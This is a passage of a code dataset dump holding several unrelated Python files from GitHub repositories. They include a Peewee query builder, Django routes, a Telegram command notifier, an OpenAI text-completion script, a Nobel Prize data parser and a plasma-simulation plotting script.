False)\n","repo_name":"sumeet29/Event-Recommendation-Engine","sub_path":"cluster_events.py","file_name":"cluster_events.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"4900215265","text":"\"\"\"Module for creating a Peewee filter query via dynamic way.\n\nNext module is used for creating a Peewee query based on request fields.\n\nReferences\n----------\nQuery operators\nhttp://docs.peewee-orm.com/en/latest/peewee/query_operators.html\n\n\"\"\"\nimport operator\nfrom functools import reduce\nfrom typing import Type\n\nimport peewee\nfrom peewee import (Model, Field, CharField, FixedCharField, TextField,\n UUIDField, ModelSelect)\n\nfrom app.utils.constants import (REQUEST_QUERY_DELIMITER,\n STRING_QUERY_OPERATORS, QUERY_OPERATORS)\n\n\nclass Helper(object):\n @staticmethod\n def build_order_by(db_model: Type[Model], request_data: dict) -> list:\n \"\"\"Build sorting fields with zero or more Column-like objects to\n order by.\n\n Example\n -------\n Peewee query: User.select().order_by(User.created_at.asc())\n\n Request fields:\n >>> from app.models.user import User\n >>> db_model = User\n >>> request_data = {'order': [{'sorting': 'asc', 'field_name': 'created_at'}]}\n >>> Helper.build_order_by(db_model, request_data)\n []\n\n Notes\n -----\n Actually is not posible to order across joins.\n\n References\n ----------\n http://docs.peewee-orm.com/en/latest/peewee/querying.html#sorting-records\n http://docs.peewee-orm.com/en/latest/peewee/api.html#Query.order_by\n\n \"\"\"\n def build_ordering(field_name, sorting) -> peewee.Ordering:\n field = getattr(db_model, field_name)\n return getattr(field, sorting)()\n\n order_by_values = []\n request_order = request_data.get('order', [{'field_name': 'id',\n 'sorting': 'asc'}])\n\n if isinstance(request_order, list):\n order_by_values = [\n build_ordering(item.get('field_name'), item.get('sorting'))\n for item in request_order\n ]\n return order_by_values\n\n def build_string_clause(self, field: Field, field_operator: str,\n field_value) -> tuple:\n \"\"\"Build string clauses.\n\n You can find next string operators:\n +------------+-----------------------------------------+\n | Name | Description |\n +============+=========================================+\n | eq | x equals y |\n +------------+-----------------------------------------+\n | ne | x is not equal to y |\n +------------+-----------------------------------------+\n | contains | Wild-card search for substring |\n +------------+-----------------------------------------+\n | ncontains | Wild-card not search for substring |\n +------------+-----------------------------------------+\n | startswith | Search for values beginning with prefix |\n +------------+-----------------------------------------+\n | endswith | Search for values ending with suffix |\n +------------+-----------------------------------------+\n\n Example\n -------\n TODO: Pending to define\n\n \"\"\"\n sql_clause = ()\n\n if field_value.find(REQUEST_QUERY_DELIMITER) != -1:\n field_value = field_value.split(REQUEST_QUERY_DELIMITER)\n sql_clauses = []\n\n for item in field_value:\n sql_clauses.append(self.build_string_clause(field,\n field_operator,\n item))\n sql_clause = reduce(operator.or_, sql_clauses)\n elif field_operator in STRING_QUERY_OPERATORS:\n if field_operator == 'eq':\n sql_clause = (field == field_value)\n elif field_operator == 'ne':\n sql_clause = (~(field == field_value))\n elif field_operator == 'contains':\n sql_clause = (field.contains(field_value))\n elif field_operator == 'ncontains':\n sql_clause = (~(field.contains(field_value)))\n elif field_operator == 'startswith':\n sql_clause = (field.startswith(field_value))\n elif field_operator == 'endswith':\n sql_clause = (field.endswith(field_value))\n\n return sql_clause\n\n def build_clause_operators(self, field: Field, field_operator: str,\n field_value) -> tuple:\n sql_clause = ()\n\n if isinstance(field_value, str) and field_value.find(REQUEST_QUERY_DELIMITER) != -1:\n field_value = field_value.split(REQUEST_QUERY_DELIMITER)\n sql_clauses = []\n\n for item in field_value:\n sql_clauses.append(self.build_clause_operators(field,\n field_operator,\n item))\n\n sql_clause = reduce(operator.or_, sql_clauses)\n elif field_operator in QUERY_OPERATORS:\n if field_operator == 'eq':\n sql_clause = (field == field_value)\n elif field_operator == 'ne':\n sql_clause = (field != field_value)\n elif field_operator == 'lt':\n sql_clause = (field < field_value)\n elif field_operator == 'lte':\n sql_clause = (field <= field_value)\n elif field_operator == 'gt':\n sql_clause = (field > field_value)\n elif field_operator == 'gte':\n sql_clause = (field >= field_value)\n elif field_operator == 'in':\n sql_clause = (field.in_(field_value.split(REQUEST_QUERY_DELIMITER)))\n elif field_operator == 'nin':\n sql_clause = (field.not_in(field_value))\n elif field_operator == 'between':\n values = field_value.split(REQUEST_QUERY_DELIMITER)\n sql_clause = (field.between(lo=values[0], hi=values[1]))\n return sql_clause\n\n def build_sql_expression(self, field: Field, field_operator: str,\n field_value):\n if isinstance(field, (CharField, FixedCharField, TextField, UUIDField)):\n sql_clause = self.build_string_clause(field, field_operator,\n field_value)\n else:\n sql_clause = self.build_clause_operators(field, field_operator,\n field_value)\n return sql_clause\n\n\nclass RequestQueryOperator(object):\n @staticmethod\n def create_search_query(db_model: Type[Model], query: ModelSelect,\n data: dict = None) -> ModelSelect:\n if data is None:\n data = {}\n\n filters = data.get('search', {})\n sql_expressions = []\n helper = Helper()\n\n for filter in filters:\n field = getattr(db_model, filter['field_name'])\n field_value = filter['field_value']\n\n if isinstance(field_value, str) and not field_value.strip():\n continue\n\n sql_expression = helper.build_sql_expression(field,\n filter['field_operator'],\n field_value)\n sql_expressions.append(sql_expression)\n\n if sql_expressions:\n query = query.where(*sql_expressions)\n\n return query\n\n @staticmethod\n def get_request_query_fields(db_model: Type[Model],\n request_data=None) -> tuple:\n request_data = request_data or {}\n\n # Page numbers are 1-based, so the first page of results will be page 1.\n # http://docs.peewee-orm.com/en/latest/peewee/querying.html#paginating-records\n page_number = int(request_data.get('page_number', 1))\n items_per_page = int(request_data.get('items_per_page', 10))\n order_by = Helper.build_order_by(db_model, request_data)\n return page_number, items_per_page, order_by\n","repo_name":"Rubenrod18/flask_api","sub_path":"app/utils/request_query_operator.py","file_name":"request_query_operator.py","file_ext":"py","file_size_in_byte":8241,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"31116990145","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('create/', views.create, name='create'),\n path('list/', views.list, name='list'),\n\n path('delete_time_confirm//', views.delete_time_confirm, name='delete_time_confirm'),\n path('delete_time//', views.delete_time, name='delete_time'),\n\n path('/', views.manage, name='manage'),\n\n path('/delete_music//', views.delete_music, name='delete_music'),\n path('/delete_music_confirm//', views.delete_music_confirm, name='delete_music_confirm'),\n\n path('/delete_player_confirm///', views.delete_player_confirm, name='delete_player_confirm'),\n path('/delete_player///', views.delete_player, name='delete_player'),\n\n path('/insta_upload/', views.insta_upload, name='insta_upload'),\n path('/update_tv_music//', views.update_tv_music, name='upate_tv_music'),\n path('/edit_music//', views.edit_music, name='edit_music'),\n]","repo_name":"GTPV/time_manager_sorijigi","sub_path":"time_manager/time_manage/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"503055095","text":"import sys\nfrom azureTTS import *\nfrom brain import *\n\ncmds = [['hi','hello','hey'],['time'],['day','date','month','year'],['list','processes','process'],['bye','stop','exit'],['wiki', 'who', 'what'],['who', 'you'],['do', 'what', 'you']]\n\ndef think(text):\n processed = processText(text) \n if any(i in cmds[0] for i in processed):\n return greetings()\n elif cmds[6] == processed:\n speak(\"Hello, I am Sunday your personal Assistant. I was created to help you in all your needs. To know more about what i can do ask \\'what can you do\\'\")\n elif cmds[7] == processed:\n return helper()\n elif any(i in cmds[1] for i in processed):\n return showTime()\n elif any(i in cmds[2] for i in processed):\n return showDate()\n elif any(i in cmds[3] for i in processed):\n return listProcess()\n elif any(i in cmds[4] for i in processed):\n return farewell()\n elif any(i in cmds[5] for i in processed):\n return wiki(\" \".join(processed[1:]))\n else:\n speak(\"Sorry I didn't quite catch that!\")\n\nthink(sys.argv[1])","repo_name":"Thanigaivels/sunday","sub_path":"core/sundayText.py","file_name":"sundayText.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23663527323","text":"#!/usr/bin/env python\n\nimport sys\nimport subprocess\nimport random\nfrom . import TelegramBotAPI as TG\nfrom .Constants import BOLD, ITALIC\nfrom .Constants import UTF8\n\nsubtitles = ['Go back to work, you lazy piece of crap!',\n 'Terminate rapidito el pucho y a seguir...',\n 'No seas tan vagazo, que en cualquier momento te rajan']\n\ndef send_message(command, output):\n # clean output\n output = output.split(b'\\x07')[-1].decode(UTF8)\n # create message\n title = f'Command {BOLD.format(command)} finished running!'\n subtitle = ITALIC.format(random.sample(subtitles, 1)[0])\n body = f'-------- {BOLD.format(\"OUTPUT\")} -------- \\n{output}'\n TG.send_message(title, body, subtitle)\n\ndef run_command():\n # run given command\n command = ' '.join(sys.argv[1:])\n zsh_command = \"/bin/zsh -i -c '{}'\".format(command)\n process = subprocess.Popen(zsh_command,\n shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n # retrieve output\n out, err = process.communicate()\n output = out if not process.returncode else err\n\n # send output\n print(f'\\n{output.decode(UTF8)}')\n send_message(command, output)\n\ndef main():\n run_command()\n\nif __name__ == '__main__':\n main()\n","repo_name":"rusito-23/tg-notify","sub_path":"src/TelegramCommandNotify.py","file_name":"TelegramCommandNotify.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15547159859","text":"import openai\n\n#use your own OpenAI API key\nopenai.api_key = 'YOU_API_KEY'\n\n\n#OpenAI completes your keywords\ndef grab_completed_text(stext):\n response = openai.Completion.create(\n engine=\"text-davinci-002\",\n prompt=stext,\n temperature=0.7,\n max_tokens=4000,\n top_p=1,\n frequency_penalty=0,\n presence_penalty=0\n )\n return response['choices'][0]['text']\n\n\n\n\n# stores queries here\nchosen_keywords = []\n\n\n# opens the people-also-ask.txt file to read the quesitons\nfile_open_paan = open('people-also-ask.txt', 'r')\nchosen_keywords = file_open_paan.read().splitlines()\noriginal_keyword_untrimmed = chosen_keywords[0].split(' ')\noriginal_keyword = \" \".join(original_keyword_untrimmed[1:])\nchosen_keywords.pop(0)\n\n#removes previous texts from the file 'openai-completed-descriptions.txt'\nopen('openai-completed-description.txt', 'w').close()\n\n# completes the introduction query\nintroduction_query = \"Write an article introduction about \" + original_keyword\nprocessed_keyword = introduction_query + original_keyword\nopenai_completed_introduction = grab_completed_text(processed_keyword)\nfile_open = open(\"openai-completed-description.txt\", 'a')\nfile_open.write(\"Introduction\\n\\n\")\nfile_open.write(f'{openai_completed_introduction}\\n\\n')\nfile_open.write(\"\\n\\n\")\n\n# completes people-also-ask queries\nfor keyword in chosen_keywords: \n completed_text = grab_completed_text(keyword)\n file_open = open(\"openai-completed-description.txt\", 'a')\n file_open.write(f'{keyword}\\n')\n file_open.write(f'{completed_text}\\n\\n')\n file_open.write(\"\\n\\n\")\n\n# completes the conclusion query\nconclusion_query = \"Write an article conclusion about \" + original_keyword\nprocessed_keyword = conclusion_query + original_keyword\nopenai_completed_introduction = grab_completed_text(processed_keyword)\nfile_open = open(\"openai-completed-description.txt\", 'a')\nfile_open.write(\"Conclusion\\n\\n\")\nfile_open.write(f'{openai_completed_introduction}\\n\\n')\nfile_open.write(\"\\n\\n\")","repo_name":"munna505/OpenAI-autocompletion","sub_path":"final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1844636038","text":"from const import *\nfrom event import *\nfrom card import *\n\n\n\ndef init(self):\n self.typ = BUFF_DYNAMIC\n self.original = True\n self.visable = False\n self.name = \"读心术\"\n self.description = \"使用: 查看并选择对方一张手牌。你使用该牌, 并且无需支付其法力。不能使用时将会弃掉该牌。\"\n\n def after_usecard(self, old_event):\n if not old_event.param[0] == self.card:\n return False\n \n group = []\n for card in self.system.cards:\n if (card.place == PLACE_HAND) and (card.player != self.card.player) and (not card.unselectable(card, self.card.player)):\n group.append(card)\n if len(group) <= 0:\n return False\n\n self.system.yell(card, 0)\n text = \"请选择一张卡片来使用。不能使用的场合将弃掉。\"\n targets = self.card.player.select(group, 1, text, 0, True, self)\n \n target = targets[0]\n sublists = [\"tinystar\"]\n self.system.playeffect(\"whiteball\", sublists, None, target)\n self.system.yell(card)\n \n old_player = target.player\n target.player = self.card.player\n if (target.unusable(target)):\n # 弃掉的场合\n target.player = old_player\n param = [[target], PLACE_GRAVE, False, False, False, False, True]\n event = Event(self.system, EVENT_MOVE, self, param)\n event.do()\n else:\n # 使用的场合\n parame = [target, None, True, False]\n event = Event(self.system, EVENT_USECARD, None, parame)\n event.do()\n \n\n self.after_usecard = after_usecard\n","repo_name":"zblcm/python-StoneAsh","sub_path":"server/buffs/b0000000009_000.py","file_name":"b0000000009_000.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"829586221","text":"from typing import Union, Iterator\n\nfrom data import AnswerRepository\nfrom data.db import open_cursor\nfrom data.entities import SubmissionAnswer, Submission\nfrom data.fieldset import EntityFields, FieldSet\n\n\nclass SubmissionAnswerRepository:\n fields = EntityFields(\n ['submission_id', 'answer_id'],\n SubmissionAnswer, 'submission_answers')\n\n @staticmethod\n def insert(submission_answer: SubmissionAnswer):\n with open_cursor() as cur:\n cur.execute(\n \"INSERT INTO submission_answers(submission_id, answer_id)\"\n \"VALUES (%s, %s);\",\n [submission_answer.submission_id, submission_answer.answer_id])\n\n @staticmethod\n def get_by_submission_join_answers(submission: Union[int, Submission]) -> Iterator[SubmissionAnswer]:\n fs = FieldSet(SubmissionAnswerRepository.fields, AnswerRepository.fields)\n if isinstance(submission, Submission):\n fs.constructor = lambda sa, a: sa.set_submission(submission).set_answer(a)\n else:\n fs.constructor = lambda sa, a: sa.set_answer(a)\n\n submission_id = int(submission)\n with open_cursor() as cur:\n cur.execute(\n f\"SELECT {fs} \"\n \"FROM submission_answers JOIN answers ON submission_answers.answer_id = answers.id \"\n \"WHERE submission_answers.submission_id = %s\",\n [submission_id])\n for submission_answer in fs.unpack_iter(cur):\n yield submission_answer\n","repo_name":"kononovarseniy/ar-forms","sub_path":"app/data/SubmissionAnswerReposiory.py","file_name":"SubmissionAnswerReposiory.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17828083419","text":"import json\nimport logging\nimport random\nfrom typing import List\n\nimport pandas as pd\nimport requests\n\nLOG_FILE = \"log.log\"\n\nlogging.basicConfig(level=logging.DEBUG, format=\"%(asctime)s - %(levelname)s - %(message)s\",\n filename=LOG_FILE, filemode='w')\n\n\nclass NobelPriceParser:\n def __init__(self, laureate_url: str, country_url: str):\n \"\"\"\n :arg laureate_url: url, country_url: url\n \"\"\"\n # Getting response from url\n self.res_laureate = requests.get(laureate_url)\n self.res_country = requests.get(country_url)\n\n # Check for response from the url\n if self.res_laureate.status_code != 200:\n logging.exception(\"Response Status of laureate : \" + self.res_laureate.status_code)\n print(\n f\"There is a error with the laureate url {laureate_url} status code : {self.res_laureate.status_code}\")\n exit()\n elif self.res_laureate.status_code != 200:\n logging.exception(\"Response Status of laureate : \" + self.res_country.status_code)\n print(f\"There is a error with the laureate url {laureate_url} status code : {self.res_country.status_code}\")\n exit()\n # Convertig the response to dataframe\n self.laureate_dataframe = pd.json_normalize(json.loads(self.res_laureate.content.decode('utf-8'))['laureates'])\n self.country_dataframe = pd.json_normalize(json.loads(self.res_country.content.decode('utf-8'))['countries'])\n\n def parser(self):\n \"\"\"\n No args requireds\n Funtion is called to process the data\n \"\"\"\n self.laureate_dataframe[\"name\"] = self.laureate_dataframe[\"firstname\"] + \" \" + self.laureate_dataframe[\n \"surname\"]\n logging.debug(\"name column is created\")\n\n self.laureate_dataframe.rename(columns={\"born\": \"dob\"}, inplace=True)\n logging.debug(\"born is renamed to dob\")\n\n self.laureate_dataframe[\"unique_prize_years\"] = self.laureate_dataframe[\"prizes\"].apply(\n lambda x: self.concat_data(prize=x, prize_key=\"year\"))\n logging.debug(\"unique_prize_years column is created\")\n\n self.laureate_dataframe[\"unique_prize_categories\"] = self.laureate_dataframe[\"prizes\"].apply(\n lambda x: self.concat_data(prize=x, prize_key=\"category\"))\n logging.debug(\"unique_prize_categories column is created\")\n\n self.laureate_dataframe[\"born_country_code_mapped\"] = self.laureate_dataframe[\"bornCountryCode\"] \\\n .apply(lambda x: self.born_country_code_mapper(country_code=x))\n logging.debug(\"born_country_code_mapped column is created\")\n\n self.laureate_dataframe = self.laureate_dataframe[\n [\"id\", \"name\", \"dob\", \"unique_prize_years\", \"unique_prize_categories\", \"gender\",\n \"born_country_code_mapped\"]]\n self.laureate_dataframe.set_index(\"id\", inplace=True)\n logging.debug(\"Selecting only required columns\")\n\n logging.debug(\"parser completed successfully\")\n\n def concat_data(self, prize: List[dict], prize_key: str) -> str:\n \"\"\"\n :arg Prize column which is list of dictionaries\n :return string\n Helper function for concatenating data\n \"\"\"\n res = [i.get(prize_key) for i in prize if i.get(prize_key)]\n return \";\".join(res) if res else pd.NA\n\n def born_country_code_mapper(self, country_code: str):\n \"\"\"\n :arg country_code: string\n \"\"\"\n r = self.country_dataframe[self.country_dataframe[\"code\"] == country_code]\n if r.size > 0:\n # Choosing random country as there are multiple countries\n # with the same symbol (mentioned in point 7 of assignment)\n r = r.head(random.randint(1, len(r)))\n return r[\"name\"].values[0]\n else:\n return pd.NA\n\n def save(self, filename: str):\n logging.debug(\"Saving dataframe\")\n self.laureate_dataframe.to_csv(filename)\n\n\nif __name__ == '__main__':\n npp = NobelPriceParser(laureate_url=\"http://api.nobelprize.org/v1/laureate.json\",\n country_url=\"http://api.nobelprize.org/v1/country.json\")\n npp.parser()\n npp.save(filename=\"out.csv\")\n","repo_name":"AjayPrasath01/NobelPrize","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33759772578","text":"# -*- coding: utf-8 -*-\n\"\"\"\n @Time : 2020/6/28 8:47\n @Author : QDY\n @FileName: 209. 长度最小的子数组.py\n\n 给定一个含有 n 个正整数的数组和一个正整数 s ,找出该数组中满足其和 ≥ s 的长度最小的连续子数组,\n 并返回其长度。如果不存在符合条件的连续子数组,返回 0。\n\n 示例: \n 输入: s = 7, nums = [2,3,1,2,4,3]\n 输出: 2\n 解释: 子数组 [4,3] 是该条件下的长度最小的连续子数组。\n\n 进阶:\n 如果你已经完成了O(n) 时间复杂度的解法, 请尝试 O(n log n) 时间复杂度的解法。\n\n\"\"\"\n\n\nclass Solution:\n def minSubArrayLen(self, target, nums):\n if not nums: return 0\n #\n n = len(nums)\n res = n + 1\n l, r, sum_ = 0, 0, 0\n while r < n: # 滑动窗口 O(n)\n while sum_ < target and r < n:\n sum_ += nums[r]\n r += 1\n while sum_ >= target:\n res = min(res, r - l)\n sum_ -= nums[l]\n l += 1\n return 0 if res == n + 1 else res\n\n # # 前缀和+二分查找 O(nlogn)\n # prefix = [0]\n # for i in range(n):\n # prefix.append(prefix[-1]+nums[i])\n # if prefix[-1]=target:\n # r = mid - 1\n # else:\n # l = mid + 1\n # if l<=n:\n # res = min(res,l-i)\n\n # return res\n","repo_name":"QDylan/Learning-","sub_path":"Leetcode/209. 长度最小的子数组.py","file_name":"209. 长度最小的子数组.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"37619946718","text":"\"\"\" \"\"\"\n\nimport sys\nsys.path.append(\"../postprocessing_tools\")\nfrom plotting_helper import make_beta_scan_plots, make_comparison_plots, plot_gmvus, plot_gzvs\nfrom plotting_helper import make_comparison_plots_for_poster\nfrom helper_ncdf import view_ncdf_variables, extract_data_from_ncdf\nfrom extract_sim_data import find_bpar_phi_ratio, find_apar_phi_ratio\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport make_param_scans as mps\n\nIMAGE_DIR = \"./images/\"\n### Give the names of all the sims here - avoids needing to type them out\n### in the methods.\n\n## fapar = 0\n# stella\nsim_st_b00001_fapar0 = \"stella_beta0.00001_fapar0/input\"\nsim_st_b001_fapar0 = \"stella_beta0.001_fapar0/input\"\nsim_st_b002_fapar0 = \"stella_beta0.002_fapar0/input\"\nsim_st_b01_fapar0 = \"stella_beta0.010_fapar0/input\"\n# gs2\nsim_gs2_b00001_fapar0 = \"gs2_beta_scan_fapar0/_0.00001\"\nsim_gs2_b001_fapar0 = \"gs2_beta_scan_fapar0/_0.0010\"\nsim_gs2_b002_fapar0 = \"gs2_beta_scan_fapar0/_0.0020\"\nsim_gs2_b01_fapar0 = \"gs2_beta_scan_fapar0/_0.0100\"\n\n## fbpar = 0\n# stella\nsim_st_b00001_fbpar0 = \"stella_beta0.00001_fbpar0/input\"\nsim_st_b00005_fbpar0 = \"stella_beta0.00005_fbpar0/input\"\nsim_st_b0001_fbpar0 = \"stella_beta0.0001_fbpar0/input\"\nsim_st_b0003_fbpar0 = \"stella_beta0.0003_fbpar0/input\"\nsim_st_b0006_fbpar0 = \"stella_beta0.0006_fbpar0/input\"\nsim_st_b0015_fbpar0 = \"stella_beta0.0015_fbpar0/input\"\nsim_st_b002_fbpar0 = \"stella_beta0.002_fbpar0/input\"\nsim_st_b003_fbpar0 = \"stella_beta0.003_fbpar0/input\"\nsim_st_b004_fbpar0 = \"stella_beta0.004_fbpar0/input\"\nsim_st_b005_fbpar0 = \"stella_beta0.005_fbpar0/input\"\nsim_st_b01_fbpar0 = \"stella_beta0.010_fbpar0/input\"\n#######\nsim_st_b001_fbpar0 = \"stella_beta0.001_fbpar0/input\"\nsim_st_b001_fbpar0_np2 = \"stella_beta0.001_fbpar0/input_np2\"\nsim_st_b001_fbpar0_np6 = \"stella_beta0.001_fbpar0/input_np6\"\nsim_st_b001_fbpar0_nzed32 = \"stella_beta0.001_fbpar0/input_nzed32\"\nsim_st_b001_fbpar0_nzed128 = \"stella_beta0.001_fbpar0/input_nzed128\"\nsim_st_b001_fbpar0_no_drive = \"stella_beta0.001_fbpar0/input_zero_drive\"\nsim_st_b001_fbpar0_no_drive_no_stream_no_mirror = \"stella_beta0.001_fbpar0/input_zero_drive_zero_streaming_zero_mirror\"\nsim_st_b001_fbpar0_no_stream_no_mirror = \"stella_beta0.001_fbpar0/input_zero_streaming_zero_mirror\"\nsim_st_b001_fbpar0_no_drive_0_upwind = \"stella_beta0.001_fbpar0/input_zero_drive_no_upwinding\"\nsim_st_b001_fbpar0_no_drive_01_upwind = \"stella_beta0.001_fbpar0/input_zero_drive_more_upwinding\"\nsim_st_b001_fbpar0_no_drive_02_upwind = \"stella_beta0.001_fbpar0/input_zero_drive_0.2_upwinding\"\nsim_st_b001_fbpar0_no_drive_mid_vres = \"stella_beta0.001_fbpar0/input_zero_drive_mid_vres\"\nsim_st_b001_fbpar0_no_drive_higher_vres = \"stella_beta0.001_fbpar0/input_zero_drive_higher_vres\"\n# NB _no_drive_no_drifts has diamagnetic and curvature drifts set to zero\nsim_st_b001_fbpar0_no_drive_no_drifts = \"stella_beta0.001_fbpar0/input_zero_drive_zero_drifts\"\nsim_st_b001_fbpar0_no_drive_lower_dt = \"stella_beta0.001_fbpar0/input_zero_drive_lower_dt\"\n# NB has diamagnetic but no curvature drifts\nsim_st_b001_fbpar0_no_mag_drift = \"stella_beta0.001_fbpar0/input_no_drifts\"\nsim_st_b001_fbpar0_no_mirror = \"stella_beta0.001_fbpar0/input_no_mirror\"\nsim_st_b001_fbpar0_no_streaming = \"stella_beta0.001_fbpar0/input_no_streaming\"\nsim_st_b001_fbpar0_no_zed_upwind = \"stella_beta0.001_fbpar0/input_no_zed_upwinding\" ## Doesn't actually do anything\nsim_st_b001_fbpar0_centered_dgdz = \"stella_beta0.001_fbpar0/input_centered_dgdz\"\nsim_st_b001_fbpar0_centered_dgdvpa = \"stella_beta0.001_fbpar0/input_centered_dgdz_and_dgdvpa\"\nsim_st_b001_fbpar0_centered_dgdvpa_dgdvpa = \"stella_beta0.001_fbpar0/input_centered_dgdz_and_dgdvpa\"\nsim_st_b001_fbpar0_centered_dgdvpa_dgdvpa_numapar = \"stella_beta0.001_fbpar0/input_centered_dgdz_and_dgdvpa_num_apar_fac\"\nsim_st_b001_fbpar0_equal_masses = \"stella_beta0.001_fbpar0_equal_masses/input\"\nsim_st_b001_fbpar0_flipflop = \"stella_beta0.001_fbpar0/input_np5_flipflop\"\n###################\n# gs2\nsim_gs2_b00001_fbpar0 = \"gs2_beta_scan_fbpar0/_0.00001\"\nsim_gs2_b001_fbpar0 = \"gs2_beta_scan_fbpar0/_0.0010\"\nsim_gs2_b001_fbpar0_equal_masses = \"gs2_beta_scan_fbpar0/_0.0010_me1\"\nsim_gs2_b002_fbpar0 = \"gs2_beta_scan_fbpar0/_0.0020\"\nsim_gs2_b003_fbpar0 = \"gs2_beta_scan_fbpar0/_0.0030\"\nsim_gs2_b004_fbpar0 = \"gs2_beta_scan_fbpar0/_0.0040\"\nsim_gs2_b005_fbpar0 = \"gs2_beta_scan_fbpar0/_0.0050\"\nsim_gs2_b01_fbpar0 = \"gs2_beta_scan_fbpar0/_0.0100\"\nsim_gs2_b03 = \"gs2_beta0.03/_0.0300\"\nsim_gs2_b03_hvr = \"gs2_beta0.03/_0.0300_higher_vres\"\nsim_gs2_b01 = \"gs2_beta0.01/_0.0100\"\nsim_gs2_b03_fbpar0 = \"gs2_beta0.03_fbpar0/_0.0300\"\nsim_gs2_b03_fapar0 = \"gs2_beta0.03_fapar0/_0.0300\"\n\n## fapar=1, fbpar=1\nsim_st_b0 = \"stella_beta0.000/input\"\nsim_st_b005 = \"stella_beta0.005/input\"\nsim_st_b01 = \"stella_beta0.010/input\"\nsim_st_b01_fbpar0_new = \"stella_fapar1_fbpar0_beta_scan/beta_0.01000\"\nsim_st_b015 = \"stella_beta0.015/input\"\nsim_st_b02 = \"stella_beta0.020/input\"\nsim_st_b025 = \"stella_beta0.025/input\"\n#sim_st_b03 = \"stella_beta0.030/input\"\nsim_st_b03 = \"stella_beta0.03/beta_0.03000\"\nsim_st_b03_fapar0 = \"stella_beta0.03_fapar0/beta_0.03000\"\nsim_st_b03_fbpar0 = \"stella_beta0.03_fbpar0/beta_0.03000\"\n\n### Local sims\nsim_st_gfvmulo_nstep100 = \"local_sims/stella_lr_gfvmulo_nstep100\"\nsim_st_gf_nstep100 = \"local_sims/stella_lr_gf_nstep100\"\nsim_st_gfvmulo_nstep1000 = \"local_sims/stella_lr_gfvmulo_beta1_nstep1000\"\nsim_st_gf_nstep1000 = \"local_sims/stella_lr_gf_beta1_nstep1000\"\n\n## The pickled files summarising G2 beta scans\npickle_gs2 = \"gs2_beta_scan/omega_values.pickle\"\npickle_gs2_fbpar0 = \"gs2_beta_scan_fbpar0/omega_values.pickle\"\n\ndef analyse_fbpar0_beta0001_results():\n \"\"\"Compare sims, all with fbpar=0, fapar=1, beta=0.001, for which\n we try turning on and off different knobs.\"\"\"\n\n make_comparison_plots([\n sim_st_b001_fbpar0,\n sim_st_b001_fbpar0_no_drive,\n sim_st_b001_fbpar0_no_mag_drift,\n sim_st_b001_fbpar0_no_mirror,\n sim_st_b001_fbpar0_equal_masses,\n sim_st_b001_fbpar0_flipflop,\n sim_st_b001_fbpar0_no_streaming,\n sim_gs2_b001_fbpar0\n ],\n [\n \"stella\",\n \"stella, zero gradients\",\n \"stella, no magnetic drifts\",\n \"stella, no mirror term\",\n \"stella, m_e=1\",\n \"stella, flip-flop\",\n \"stella, no streaming\",\n \"GS2\"\n ],\n \"images/termsoff_beta_0.001_fbpar0\",\n sim_types=[\n \"stella\",\n \"stella\",\n \"stella\",\n \"stella\",\n \"stella\",\n \"stella\",\n \"stella\",\n # \"stella\",\n \"gs2\"\n ],\n plot_apar=True,\n plot_format=\".eps\"\n )\n make_comparison_plots([\n sim_st_b001_fbpar0,\n sim_st_b001_fbpar0_np2,\n sim_st_b001_fbpar0_np6,\n sim_gs2_b001_fbpar0\n ],\n [\n \"stella\",\n \"stella, nperiod=2\",\n \"stella, nperiod=6\",\n \"GS2\"\n ],\n \"images/beta_0.001_fbpar0_nperiod_scan\",\n sim_types=[\n \"stella\",\n \"stella\",\n \"stella\",\n \"gs2\"\n ],\n plot_apar=True,\n plot_format=\".eps\"\n )\n make_comparison_plots([\n sim_st_b001_fbpar0,\n sim_st_b001_fbpar0_nzed32,\n sim_st_b001_fbpar0_nzed128,\n sim_gs2_b001_fbpar0\n ],\n [\n \"stella\",\n \"stella, nzed=32\",\n \"stella, nzed=128\",\n \"GS2\"\n ],\n \"images/beta_0.001_fbpar0_nzed_scan\",\n sim_types=[\n \"stella\",\n \"stella\",\n \"stella\",\n \"gs2\"\n ],\n plot_apar=True,\n plot_format=\".png\"\n )\n make_comparison_plots([\n sim_st_b001_fbpar0,\n sim_st_b001_fbpar0_centered_dgdz,\n sim_st_b001_fbpar0_centered_dgdvpa_dgdvpa,\n #sim_st_b001_fbpar0_centered_dgdvpa_dgdvpa_numapar,\n sim_gs2_b001_fbpar0\n ],\n [\n \"stella, dg/dz third-order-upwind\",\n \"stella, dg/dz centered on proc0\",\n \"stella, dg/dz centered on all procs\",\n #\"stella, dg/dz centered, dg/dvpa centered, num.\",\n \"GS2\"\n ],\n \"images/beta_0.001_fbpar0_dgdz_centering\",\n sim_types=[\n \"stella\",\n \"stella\",\n \"stella\",\n #\"stella\",\n \"gs2\"\n ],\n plot_apar=True,\n plot_format=\".png\"\n )\n compare_omega_for_fbpar0_changing_streaming_and_drive()\n\n return\n\ndef analyse_results_for_poster():\n 